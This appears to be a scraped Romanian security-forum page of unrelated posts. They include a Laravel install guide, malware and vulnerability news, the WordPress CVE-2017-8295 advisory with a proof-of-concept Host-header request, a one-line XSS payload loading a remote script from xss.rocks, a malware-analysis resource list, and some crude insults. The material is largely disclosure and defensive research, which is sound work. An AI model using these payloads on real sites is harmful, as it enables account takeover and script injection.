Leaderboard

M-a tot văzut ca bântui pe aici pe forum si na, totuși e prea tare. Cel mai tare cadou de ziua mea https://imgur.com/a/Xv1DU

Cand am citit titlul credeam ca vii sa ceri sfaturi de gonoree, sifilis, chlamydia, etc.

Laravel is an open source PHP framework that follows the MVC (Model-View-Controller) design pattern. It has been created by Taylor Otwell in 2011 as an attempt to provide an advanced alternative to the CodeIgniter (CI) framework. In 2011, the Laravel project released version 1 and 2, this year version 5.4 has been released with many improvements like Command-Line (CLI) support named 'artisan', built-in support for more database types and improved routing. In this tutorial, I will show you how to install the Laravel Web Framework with Nginx web server, PHP-FPM 7.1 and MariaDB on a CentOS 7 system. I will show you step by step how to install and configure Laravel under the LEMP stack on CentOS 7 server. Prerequisite: CentOS 7 Server. Root Privileges. Step 1 - Install the EPEL Repository EPEL or Extra Package for Enterprise Linux is an additional package repository that provides useful software packages that are not included in the CentOS official repository. It can be installed on RPM based Linux distributions like CentOS and Fedora. In this tutorial, we need the EPEL repository for the Nginx installation as Nginx packages do not exist in the official CentOS repository. Install the EPEL repository with the yum command below. yum -y install epel-release EPEL repository has been installed. Step 2 - Install Nginx In this tutorial, we will run a Laravel under the LEMP Stack. Nginx is the web server part of the LEMP stack and can be installed from EPEL repository. Install Nginx 1.10 from the EPEL repository with yum. yum -y install nginx When the installation is complete, start Nginx and add it to start at boot time. systemctl start nginx systemctl enable nginx Nginx is running on port 80, check it with the netstat command below. netstat -plntu In case you get 'Command not found' as result, then install the net-tools package as shown below. yum -y install net-tools Step 3 - Install and Configure PHP-FPM 7.1 Laravel can be installed on a server with PHP version >= 5.6.4. In this tutorial, we will use the latest version PHP 7.1 that is supported by Laravel. PHP 7.1 does not exist in the CentOS base repository, we need to install it from a third party repository named 'webtatic'. Install the webtatic repository with this rpm command. rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm Now we can install PHP-FPM with all of the extensions needed by Laravel with a single yum command. yum install -y php71w php71w-curl php71w-common php71w-cli php71w-mysql php71w-mbstring php71w-fpm php71w-xml php71w-pdo php71w-zip PHP 7.1 has been installed on our CentOS 7 system. Next, configure PHP by editing the configuration file php.ini with vim. vim /etc/php.ini Uncomment the line below and change the value to 0. cgi.fix_pathinfo=0 Save the file and exit the editor. Now edit the PHP-FPM file www.conf. vim /etc/php-fpm.d/www.conf PHP-FPM will run under the user and group 'nginx', change the value of the two lines below to 'nginx'. user = nginx group = nginx Instead of using the server port, PHP-FPM will run under a socket file. Change the 'listen' value to the path '/run/php-fpm/php-fpm.sock' as shown below. listen = /run/php-fpm/php-fpm.sock The socket file owner will be the 'nginx' user, and the permission mode is 660. Uncomment and change all values like this: listen.owner = nginx listen.group = nginx listen.mode = 0660 For the environment variables, uncomment these lines and set the values as shown below. env[HOSTNAME] = $HOSTNAME env[PATH] = /usr/local/bin:/usr/bin:/bin env[TMP] = /tmp env[TMPDIR] = /tmp env[TEMP] = /tmp Save the file and exit vim, then start PHP-FPM and enable it to run at boot time. systemctl start php-fpm systemctl enable php-fpm PHP-FPM is running under the socket file, check it with the command below. netstat -pl | grep php-fpm.sock The PHP and PHP-FPM 7.1 installation and configuration have been completed. Step 4 - Install MariaDB Server You can use MySQL or PostgreSQL for your Laravel project. I will use the MariaDB database server for this tutorial. It's available in the CentOS repository. Install MariaDB-server with the yum command below. yum -y install mariadb mariadb-server When the installation is complete, start 'mariadb' and enable it to start at boot time. systemctl start mariadb systemctl enable mariadb MariaDB has been started and is running on port 3306, check it with the netstat command. netstat -plntu Next, configure the root password for MariaDB with the 'mylsq_secure_installation' command below. mysql_secure_installation Type in your mariadb root password, remove the anonymous user etc. Set root password? [Y/n] Y Remove anonymous users? [Y/n] Y Disallow root login remotely? [Y/n] Y Remove test database and access to it? [Y/n] Y Reload privilege tables now? [Y/n] Y MariaDB installation and configuration has been completed. Step 5 - Install PHP Composer PHP composer is a package manager for the PHP programming language. It has been created in 2011 and it's inspired by the Node.js 'npm' and Ruby's 'bundler' installer. Install composer with the curl command. curl -sS https://getcomposer.org/installer | sudo php -- --install-dir=/usr/bin --filename=composer When the installation completed, try to use the 'composer' command and you will see the results as below. composer PHP Composer installed on CentOS 7. Step 6 - Configure Nginx Virtual Host for Laravel In this step, we will create the nginx virtual host configuration for the Laravel project. We need to define the web root directory for this Laravel installation, I will use the '/var/www/laravel' directory as web root directory. Create it with the mkdir command below: mkdir -p /var/www/laravel Next, go to the nginx directory and create a new virtual host configuration file laravel.conf in the conf.d directory. cd /etc/nginx vim conf.d/laravel.conf Paste the configuration below into the file: server { listen 80; listen [::]:80 ipv6only=on; # Log files for Debugging access_log /var/log/nginx/laravel-access.log; error_log /var/log/nginx/laravel-error.log; # Webroot Directory for Laravel project root /var/www/laravel/public; index index.php index.html index.htm; # Your Domain Name server_name laravel.hakase-labs.co; location / { try_files $uri $uri/ /index.php?$query_string; } # PHP-FPM Configuration Nginx location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/run/php-fpm/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } } Save the file and exit vim. Test the nginx configuration and make sure there is no error, then restart the nginx service. nginx -t systemctl restart nginx The nginx virtual host configuration for Laravel has been completed. Step 7 - Install Laravel Before installing Laravel, we need to install unzip on the server. yum -y install unzip Now go to the laravel web root directory '/var/www/laravel'. cd /var/www/laravel Laravel provides two ways for the installation of the framework on the server. We can install Laravel with the laravel installer, and we can install it with PHP composer. In this tutorial, I will install Laravel by creating a new project with the composer command. Run the command below to install Laravel. composer create-project laravel/laravel . Wait for the Laravel installation to finish. This may take some time. When the installation is complete, change the owner of the Laravel web root directory to the 'nginx' user, and change the permission of the storage directory to 755 with the commands below. chown -R nginx:root /var/www/laravel chmod 755 /var/www/laravel/storage Laravel installation has been completed. Step 8 - Configure SELinux In this tutorial, Laravel will run under SELinux 'Enforcing' mode. To check the SELinux status, run the command below. sestatus The result is that SELinux is running in 'Enforcing' mode. Next, we need to install the SELinux management tools for CentOS 7. Install 'policycoreutils-python' on the server. yum -y install policycoreutils-python Now we need to change the context of the Laravel directories and then apply the changes with the restorecon command. Run the SELinux management commands as shown below. semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/public(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/storage(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/app(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/bootstrap(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/config(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/database(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/resources(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/routes(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/vendor(/.*)?' semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/tests(/.*)?' restorecon -Rv '/var/www/laravel/' SELinux configuration for Laravel is done. Step 9 - Testing Laravel Open your web browser and type in the Laravel URL of your server. We've defined the domain name for the Laravel in the Nginx virtual host file. Mine is laravel.hakase-labs.co. When you visit the domain name, you will see the Laravel home page. Laravel installation with Nginx, PHP-FPM7, and MariaDB on CentOS 7 has been successful. Reference https://laravel.com/docs/5.4/installation Source https://www.howtoforge.com/tutorial/how-to-install-laravel-5x-with-nginx-and-php-fpm-7-on-centos-7/

First spotted in December 2016, the attack is tied to the EITest compromise chain, and has been observed distributing the Fleercivet ad fraud malware and ransomware variants such as Spora and Mole. Initially targeting only Chrome, the campaign was expanded earlier this year to target Firefox users as well. The attack relies on pop-ups being displayed in the Chrome browser on Windows devices, claiming that users need to install a so called HoeflerText font pack. Code injected into compromised websites would make the visited pages look unreadable, thus making the fake popup seem legitimate. Fingerprinting capabilities included in the injected code trigger the attack if certain criteria are met (targeted country, correct User-Agent (Chrome on Windows) and proper referer). If the social engineering scheme is successful and the user accepts to install the fake font pack, a file named Font_Chrome.exe is downloaded and executed, and their system is infected with malware. Starting in late August, the malware distributed via these fake Chrome font update notifications is the NetSupport Manager remote access tool (RAT). According to Palo Alto Networks’ Brad Duncan, this should indicate “a potential shift in the motives of this adversary.” The most recent versions of Font_Chrome.exe are represented by file downloaders designed to retrieve a follow-up malware that would install NetSupport Manager. This commercially-available RAT was previously associated with a campaign from hacked Steam accounts last year. While analyzing the recent attack, Palo Alto’s researchers discovered two variants of the file downloader and two instances of follow-up malware to install the RAT. Although the RAT is already at version 12.5, the version Chrome users are targeted with is at version 11.0, the researchers discovered. Chrome users on Windows systems should be suspicious of any popup messages that inform them the “HoeflerText” font wasn’t found. Affected users aren’t expected to notice a difference in their system’s operation, given that this is a backdoor program, but that doesn’t mean they weren’t compromised. He also points out that RATs give attackers more capabilities on an infected host and also provide more flexibility compared with malware that has been designed for a single purpose, and that the recently observed change in the EITest HoeflerText popups might suggest that ransomware is slightly less prominent than it once was. Via http://www.securityweek.com/fake-chrome-font-update-attack-distributes-backdoor

Security researchers at lgtm.com have discovered a critical remote code execution vulnerability in Apache Struts — a popular open-source framework for developing web applications in the Java programming language. All versions of Struts since 2008 are affected; all web applications using the framework’s popular REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency. This vulnerability has been addressed in Struts version 2.5.13. lgtm provides free software engineering analytics for open-source projects; at the time this post is published, over 50,000 projects are continuously monitored. Anyone can write their own analyses; ranging from checks for enforcing good coding practices to advanced analyses to find security vulnerabilities. The lgtm security team actively helps the open-source community to uncover critical security vulnerabilities in OSS projects. This particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data. The lgtm security team have a simple working exploit for this vulnerability which will not be published at this stage. At the time of the announcement there is no suggestion that an exploit is publicly available, but it is likely that there will be one soon. The Apache Struts development team have confirmed the severity of this issue and released a patch today: The Struts maintainers have posted an announcement on their website and the vulnerability has been assigned CVE 2017-9805. More information about how this vulnerability was found using lgtm.com is available in a separate blog post. Analyst Fintan Ryan at RedMonk estimates that at least 65% of the Fortune 100 companies are actively using web applications built with the Struts framework. Organizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader’s Digest, Office Depot, and SHOWTIME are known to have developed applications using the framework. This illustrates how widespread the risk is. When asked for a comment, the Chief Information Security Officer of a Tier 1 bank confirmed that Struts is still used in large numbers of applications and that this finding poses a real threat: Man Yue Mo, one of the lgtm security researchers who discovered this vulnerability, confirms the criticality: He has written a blog post that describes in more detail how he found this particular vulnerability using the flexible and powerful query language at the heart of lgtm. The lgtm queries flag up software problems and security vulnerabilities on a daily basis. The analysis results for a large number of projects is readily available on lgtm.com, including for popular projects like Hadoop, Jetty, Maven, and Storm — all of which have millions of users, and are the building blocks of famous platforms like Twitter, Spotify, Google, and Amazon. Oege de Moor, CEO and founder of Semmle (the company behind lgtm): The technology that powers lgtm is used by many organizations to analyze their software development process and find security vulnerabilities like the one in Struts. These organizations include: Source: https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement

Să-ți bag căcat in păr și lui Zukerberg la fel.

https://politiaromana.ro

Cica la 1&1 se lucreaza mult si pe partea de security. Dar alegeti dupa cum credeti, fiecare firma are plusuri si minusuri.

S-a lucrat mult pe partea de customer service & support in ultima perioada.

Destul de drăguţe challenge-ul de înregistrare şi probele de pe site. Arunc un ochi diseară peste challenge-uri. Uitaţi un mic hint pentru cei care nu aţi trecut încă de el: mergeţi pe firul logic al paginii. Veţi avea nevoie de asta şi asta.

Ultimul update al listei: 29.08.2017 Aplicatii Extensii Chrome Design Scripturi JS & HTML Teme HTML Scripturi PHP Plugin-uri Wordpress Teme Wordpress Tutoriale Misc

Ma frate, vad ca esti din Braila, ca si mine de altfel, pai like-urile merg la noi la Braila ? du' si tu o fata la club, taie pe cineva ... lasa calculatoru ca nu-ti face bine.

Super POC: http://m.blog.csdn.net/caiqiiqi/article/details/77861477

La mulţi ani!

E aceeasi zdreanta de aici -> https://rstforums.com/forum/topic/106302-phphtml/?tab=comments#comment-653465. Proaste puli o fost la curu' lu' ma-sa.

Finally, European companies must inform employees in advance if their work email accounts are being monitored. The European Court of Human Rights (ECHR) on Tuesday gave a landmark judgement concerning privacy in the workplace by overturning an earlier ruling that gave employers the right to spy on workplace communications. The new ruling came in judging the case of Romanian engineer Bogdan Barbulescu, who was fired ten years ago for sending messages to his fianceé and brother using his workplace Yahoo Messenger account. Earlier Romanian courts had rejected Barbulescu’s complaint that his employer had violated his right to correspondence—including in January last year when it was ruled that it was not "unreasonable for an employer to want to verify that the employees are completing their professional tasks during working hours." But now, the European court ruled by an 11-6 majority that Romanian judges failed to protect Barbulescu’s right to private life and correspondence, as set out in article 8 of the European Convention on Human Rights. Apparently, Barbulescu's employer had infringed his right to privacy by not informing him in advance that the company was monitoring his account and communications. His employer used surveillance software in order to monitor his computer activities. The ruling will now become law in 47 countries that have ratified the European Convention on Human Rights. In a Q & A section on its website, the European Court of Human Rights says the judgement doesn't mean that companies can't now monitor their employee’s communications at workplace and that they can still dismiss employees for private use. However, the ECHR says that the employers must inform their staff in advance if their communications are being monitored, and that the monitoring must be carried out for legitimate purposes and limited. Via thehackernews.com

Pentru cei care le au cu Docker recomand: https://github.com/laradock/laradock

Alegerea corecta a sterilizatoarelor de biberoane Care sunt cele mai bune biberoane pentru bebelusi Obiceiuri bizare care te pot surprinde in strainatate Ce trebuie sa stim despre lentilele de contact Clipele de dinaintea dezastrelor, in poze haioase Ideale in gospodarie: 10 intrebuintari nestiute ale staniolului Alimente care devin toxice in cuptorul cu microunde Opt aplicatii pentru smartphone despre care nu stiai Cum sa te pregatesti inainte de a pleca in vacanta And more... ___________________________________________________________________________________________________________________________________________________ Learn to read Chinese ... with ease! | ShaoLan ___________________________________________________________________________________________________________________________________________________ Fastest Way to Tie a Tie EVER

Ii aduc afront vreunuia de pe aici care lucreaza la ei? Sorry dar asta a fost experienta mea cu 1 dedicat timp de 1 an la ei.

Fugi de 1&1 ca de lepra. Printre companiile cu cel mai de rahat customer service & support. Probabil vrei ceva "oferta" de la ei insa daca vrei sa ramai client pe termen lung tot acolo ajungi cu pretul. Sunt client namecheap.com din 2006 si nu am de ce ma plange.

De ce ai ales 1&1 ? https://www.namecheap.com/ https://ro.easyhost.com https://joker.com/ mai sunt astia, dar nu stiu nimic despre ei: https://www.romarg.ro/oferta-preturi.html

Ai verificat măcar domeniul site ului? Ai văzut măcar ca nici nu este eMAG. Ro ?

HUNT Burp Suite Extension HUNT is a Burp Suite extension to: Identify common parameters vulnerable to certain vulnerability classes. Organize testing methodologies inside of Burp Suite. HUNT Scanner (hunt_scanner.py) This extension does not test these parameters but rather alerts on them so that a bug hunter can test them manually (thoroughly). For each class of vulnerability, Bugcrowd has identified common parameters or functions associated with that vulnerability class. We also provide curated resources in the issue description to do thorough manual testing of these vulnerability classes. HUNT Methodology (hunt_methodology.py) This extension allows testers to send requests and responses to a Burp tab called "HUNT Methodology". This tab contains a tree on the left side that is a visual representation of your testing methodology. By sending request/responses here testers can organize or attest to having done manual testing in that section of the application or having completed a certain methodology step. Getting Started with HUNT First ensure you have the latest standalone Jython JAR set up under "Extender" -> "Options". Add HUNT via "Extender" -> "Extensions". HUNT Scanner will begin to run across traffic that flows through the proxy. Important to note, HUNT Scanner leverages the passive scanning API. Here are the conditions under which passive scan checks are run: First request of an active scan Proxy requests Any time "Do a passive scan" is selected from the context menu Passive scans are not run on the following: On every active scan response On Repeater responses On Intruder responses On Sequencer responses On Spider responses Instead, the standard workflow would be to set your scope, run Burp Spider from Target tab, then right-click "Passively scan selected items". HUNT Scanner Vulnerability Classes SQL Injection Local/Remote File Inclusion & Path Traversal Server Side Request Forgery & Open Redirect OS Command Injection Insecure Direct Object Reference Server Side Template Injection Logic & Debug Parameters Cross Site Scripting External Entity Injection Malicious File Upload TODO Change regex for parameter names to include user_id instead of just id Search in scanner window Highlight param in scanner window Implement script name checking, REST URL support, JSON & XML post-body params. Support normal convention of Request tab: Raw, Params, Headers, Hex sub-tabs inside scanner Add more methodology JSON files: Web Application Hacker's Handbook PCI HIPAA CREST OWASP Top Ten OWASP Application Security Verification Standard Penetration Testing Execution Standard Burp Suite Methodology Add more text for advisory in scanner window Add more descriptions and resources in methodology window Add functionality to send request/response to other Burp tabs like Repeater Authors JP Villanueva Jason Haddix Ryan Black Fatih Egbatan Vishal Shah License Licensed with the Apache 2.0 License here Sursa: https://github.com/bugcrowd/HUNT

%00%00%00%00%00%00%00<script%20src=http://xss.rocks/xss.js ></script> Sursa: https://twitter.com/0rbz_/status/896896095862669312

==================================================== - Discovered by: Dawid Golunski (@dawid_golunski) - dawid[at]legalhackers.com - https://legalhackers.com - ExploitBox.io (@Exploit_Box) - CVE-2017-8295 - Release date: 03.05.2017 - Revision 1.0 - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day) II. BACKGROUND ------------------------- "WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress was used by more than 27.5% of the top 10 million websites as of February 2017. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites." https://en.wikipedia.org/wiki/WordPress III. INTRODUCTION ------------------------- Wordpress has a password reset feature that contains a vulnerability which might in some cases allow attackers to get hold of the password reset link without previous authentication. Such attack could lead to an attacker gaining unauthorised access to a victim's WordPress account. IV. DESCRIPTION ------------------------- The vulnerability stems from WordPress using untrusted data by default when creating a password reset e-mail that is supposed to be delivered only to the e-mail associated with the owner's account. This can be observed in the following code snippet that creates a From email header before calling a PHP mail() function: ------[ wp-includes/pluggable.php ]------ ... if ( !isset( $from_email ) ) { // Get the site domain and get rid of www. $sitename = strtolower( $_SERVER['SERVER_NAME'] ); if ( substr( $sitename, 0, 4 ) == 'www.' ) { $sitename = substr( $sitename, 4 ); } $from_email = 'wordpress@' . $sitename; } ... ----------------------------------------- As we can see, Wordpress is using SERVER_NAME variable to get the hostname of the server in order to create a From/Return-Path header of the outgoing password reset email. However, major web servers such as Apache by default set the SERVER_NAME variable using the hostname supplied by the client (within the HTTP_HOST header): https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname Because SERVER_NAME can be modified, an attacker could set it to an arbitrary domain of his choice e.g: attackers-mxserver.com which would result in Wordpress setting the $from_email to wordpress@attackers-mxserver.com and thus result in an outgoing email with From/Return-Path set to this malicious address. As to which e-mail header the attacker would be able to modify - From or Return-Path, it depends on the server environment. As can be read on http://php.net/manual/en/function.mail.php The From header sets also Return-Path under Windows. Depending on the configuration of the mail server, it may result in an email that gets sent to the victim WordPress user with such malicious From/Return-Path address set in the email headers. This could possibly allow the attacker to intercept the email containing the password reset link in some cases requiring user interaction as well as without user interaction. Some example scenarios include: * If attacker knows the email address of the victim user. They can perform a prior DoS attack on the victim's email account (e.g by sending multiple large files to exceed user's disk quota, or attacking the DNS server) in order to cause the password reset email to be rejected by the receiving server, or not reach the destination and thus get returned to the account on attacker's server * Some autoresponders might attach a copy of the email sent in the body of the auto-replied message * Sending multiple password reset emails to force the user to reply to the message to enquiry explanation for endless password reset emails. The reply containing the password link would then be sent to attacker. etc. V. PROOF OF CONCEPT ------------------------- If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost): -----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------ Wordpress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. As a result, Wordpress will pass the following headers and email body to the /usr/bin/sendmail wrapper: ------[ resulting e-mail ]----- Subject: [CompanyX WP] Password Reset Return-Path: <wordpress@attackers-mxserver.com> From: WordPress <wordpress@attackers-mxserver.com> Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Someone requested that the password be reset for the following account: http://companyX-wp/wp/wordpress/ Username: admin If this was a mistake, just ignore this email and nothing will happen. To reset your password, visit the following address: <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin> ------------------------------- As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set. The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of: #!/bin/bash cat > /tmp/outgoing-email VI. BUSINESS IMPACT ------------------------- Upon a successfull exploitation, attacker may be able to reset user's password and gain unauthorized access to their WordPress account. VII. SYSTEMS AFFECTED ------------------------- All WordPress versions up to the latest 4.7.4 VIII. SOLUTION ------------------------- No official solution available. As a temporary solution users can enable UseCanonicalName to enforce static SERVER_NAME value https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname This issue was first reported to WordPress security team multiple times, with the first report sent in July 2016. As there has been no progress in this case , this advisory is finally released to the public without an official patch. IX. REFERENCES ------------------------- https://legalhackers.com https://ExploitBox.io Vendor site: https://wordpress.org http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname http://php.net/manual/en/function.mail.php https://tools.ietf.org/html/rfc5321 X. CREDITS ------------------------- Discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com https://ExploitBox.io Thanks to BeyondSecurity for help with contacting the vendor. XI. REVISION HISTORY ------------------------- 03.05.2017 - Advisory released, rev. 1 XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS ------------------------- ExploitBox.io is coming soon. Subscribe at https://ExploitBox.io to stay updated and be there for the launch. XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

A curated list of awesome malware analysis tools and resources. Inspired by awesome-python and awesome-php. Awesome Malware Analysis Malware Collection Anonymizers Honeypots Malware Corpora Open Source Threat Intelligence Tools Other Resources Detection and Classification Online Scanners and Sandboxes Domain Analysis Browser Malware Documents and Shellcode File Carving Deobfuscation Debugging and Reverse Engineering Network Memory Forensics Windows Artifacts Storage and Workflow Miscellaneous Resources Books Twitter Other Related Awesome Lists Contributing Thanks Malware Collection Anonymizers Web traffic anonymizers for analysts. Anonymouse.org - A free, web based anonymizer. OpenVPN - VPN software and hosting solutions. Privoxy - An open source proxy server with some privacy features. Tor - The Onion Router, for browsing the web without leaving traces of the client IP. Honeypots Trap and collect your own samples. Conpot - ICS/SCADA honeypot. Cowrie - SSH honeypot, based on Kippo. Dionaea - Honeypot designed to trap malware. Glastopf - Web application honeypot. Honeyd - Create a virtual honeynet. HoneyDrive - Honeypot bundle Linux distro. Mnemosyne - A normalizer for honeypot data; supports Dionaea. Thug - Low interaction honeyclient, for investigating malicious websites. Malware Corpora Malware samples collected for analysis. Clean MX - Realtime database of malware and malicious domains. Contagio - A collection of recent malware samples and analyses. Exploit Database - Exploit and shellcode samples. Malshare - Large repository of malware actively scrapped from malicious sites. samples directly from a number of online sources. MalwareDB - Malware samples repository. Open Malware Project - Sample information and downloads. Formerly Offensive Computing. Ragpicker - Plugin based malware crawler with pre-analysis and reporting functionalities theZoo - Live malware samples for analysts. ViruSign - Malware database that detected by many anti malware programs except ClamAV. VirusShare - Malware repository, registration required. Zeltser's Sources - A list of malware sample sources put together by Lenny Zeltser. Zeus Source Code - Source for the Zeus trojan leaked in 2011. Open Source Threat Intelligence Tools Harvest and analyze IOCs. AbuseHelper - An open-source framework for receiving and redistributing abuse feeds and threat intel. AlienVault Open Threat Exchange - Share and collaborate in developing Threat Intelligence. Combine - Tool to gather Threat Intelligence indicators from publicly available sources. Fileintel - Pull intelligence per file hash. Hostintel - Pull intelligence per host. IntelMQ - A tool for CERTs for processing incident data using a message queue. IOC Editor - A free editor for XML IOC files. ioc_writer - Python library for working with OpenIOC objects, from Mandiant. Massive Octo Spice - Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation. MISP - Malware Information Sharing Platform curated by The MISP Project. PassiveTotal - Research, connect, tag and share IPs and domains. PyIOCe - A Python OpenIOC editor. threataggregator - Aggregates security threats from a number of sources, including some of those listed below in other resources. ThreatCrowd - A search engine for threats, with graphical visualization. ThreatTracker - A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines. TIQ-test - Data visualization and statistical analysis of Threat Intelligence feeds. Other Resources Threat intelligence and IOC resources. Autoshun (list) - Snort plugin and blocklist. Bambenek Consulting Feeds - OSINT feeds based on malicious DGA algorithms. Fidelis Barncat - Extensive malware config database (must request access). CI Army (list) - Network security blocklists. Critical Stack- Free Intel Market - Free intel aggregator with deduplication featuring 90+ feeds and over 1.2M indicators. CRDF ThreatCenter - List of new threats detected by CRDF anti-malware. FireEye IOCs - Indicators of Compromise shared publicly by FireEye. FireHOL IP Lists - Analytics for 350+ IP lists with a focus on attacks, malware and abuse. Evolution, Changes History, Country Maps, Age of IPs listed, Retention Policy, Overlaps. hpfeeds - Honeypot feed protocol. Internet Storm Center (DShield) - Diary and searchable incident database, with a web API (unofficial Python library). malc0de - Searchable incident database. Malware Domain List - Search and share malicious URLs. OpenIOC - Framework for sharing threat intelligence. Palevo Blocklists - Botnet C&C blocklists. Proofpoint Threat Intelligence - Rulesets and more. (Formerly Emerging Threats.) STIX - Structured Threat Information eXpression - Standardized language to represent and share cyber threat information. Related efforts from MITRE: CAPEC - Common Attack Pattern Enumeration and Classification CybOX - Cyber Observables eXpression MAEC - Malware Attribute Enumeration and Characterization TAXII - Trusted Automated eXchange of Indicator Information threatRECON - Search for indicators, up to 1000 free per month. Yara rules - Yara rules repository. ZeuS Tracker - ZeuS blocklists. Detection and Classification Antivirus and other malware identification tools AnalyzePE - Wrapper for a variety of tools for reporting on Windows PE files. chkrootkit - Local Linux rootkit detection. ClamAV - Open source antivirus engine. Detect-It-Easy - A program for determining types of files. ExifTool - Read, write and edit file metadata. hashdeep - Compute digest hashes with a variety of algorithms. Loki - Host based scanner for IOCs. Malfunction - Catalog and compare malware at a function level. MASTIFF - Static analysis framework. MultiScanner - Modular file scanning/analysis framework nsrllookup - A tool for looking up hashes in NIST's National Software Reference Library database. packerid - A cross-platform Python alternative to PEiD. PEV - A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries. Rootkit Hunter - Detect Linux rootkits. ssdeep - Compute fuzzy hashes. totalhash.py - Python script for easy searching of the TotalHash.cymru.com database. TrID - File identifier. YARA - Pattern matching tool for analysts. Yara rules generator - Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives. Online Scanners and Sandboxes Web-based multi-AV scanners, and malware sandboxes for automated analysis. APK Analyzer - Free dynamic analysis of APKs. AndroTotal - Free online analysis of APKs against multiple mobile antivirus apps. AVCaesar - Malware.lu online scanner and malware repository. Cryptam - Analyze suspicious office documents. Cuckoo Sandbox - Open source, self hosted sandbox and automated analysis system. cuckoo-modified - Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author. cuckoo-modified-api - A Python API used to control a cuckoo-modified sandbox. DeepViz - Multi-format file analyzer with machine-learning classification. detux - A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs. Document Analyzer - Free dynamic analysis of DOC and PDF files. DRAKVUF - Dynamic malware analysis system. File Analyzer - Free dynamic analysis of PE files. firmware.re - Unpacks, scans and analyzes almost any firmware package. Hybrid Analysis - Online malware analysis tool, powered by VxSandbox. IRMA - An asynchronous and customizable analysis platform for suspicious files. Joe Sandbox - Deep malware analysis with Joe Sandbox. Jotti - Free online multi-AV scanner. Limon - Sandbox for Analyzing Linux Malwares Malheur - Automatic sandboxed analysis of malware behavior. Malwr - Free analysis with an online Cuckoo Sandbox instance. MASTIFF Online - Online static analysis of malware. Metadefender.com - Scan a file, hash or IP address for malware (free) NetworkTotal - A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro. Noriben - Uses Sysinternals Procmon to collect information about malware in a sandboxed environment. PDF Examiner - Analyse suspicious PDF files. ProcDot - A graphical malware analysis tool kit. Recomposer - A helper script for safely uploading binaries to sandbox sites. SEE - Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments. URL Analyzer - Free dynamic analysis of URL files. VirusTotal - Free online analysis of malware samples and URLs Visualize_Logs - Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come...) Zeltser's List - Free automated sandboxes and services, compiled by Lenny Zeltser. Domain Analysis Inspect domains and IP addresses. Desenmascara.me - One click tool to retrieve as much metadata as possible for a website and to assess its good standing. Dig - Free online dig and other network tools. dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage. IPinfo - Gather information about an IP or domain by searching online resources. Machinae - OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator. mailchecker - Cross-language temporary email detection library. MaltegoVT - Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports. SenderBase - Search for IP, domain or network owner. SpamCop - IP based spam block list. SpamHaus - Block list based on domains and IPs. Sucuri SiteCheck - Free Website Malware and Security Scanner. TekDefense Automater - OSINT tool for gathering information about URLs, IPs, or hashes. URLQuery - Free URL Scanner. Whois - DomainTools free online whois search. Zeltser's List - Free online tools for researching malicious websites, compiled by Lenny Zeltser. ZScalar Zulu - Zulu URL Risk Analyzer. Browser Malware Analyze malicious URLs. See also the domain analysis and 